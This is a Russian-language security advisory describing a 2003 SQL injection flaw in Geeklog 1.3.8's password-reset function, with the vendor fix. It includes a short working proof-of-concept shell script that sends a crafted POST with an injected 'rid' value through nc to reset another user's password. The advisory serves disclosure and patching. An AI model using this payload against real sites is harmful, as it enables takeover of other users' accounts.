Sql инъекция в Geeklog

Дата публикации:
21.10.2003
Всего просмотров:
982
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Geeklog 1.3.8

Описание: Уязвимость обнаружена в Geeklog. Злонамеренный пользователь может манипулировать SQL запросами.

Злонамеренный пользователь может манипулировать параметром "reqid" при обновлении пароля, чтобы изменить пароль произвольного пользователя.

Пример/Эксплоит:

#!/bin/sh

echo "POST /path/to/gl/users.php HTTP/1.0
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc localhost 80

URL производителя:http://www.geeklog.net

Решение: Обновите программу до 1.3.8-1sr2: http://www.geeklog.net/filemgmt/visit.php?lid=254

Ссылки: Geeklog

или введите имя

CAPTCHA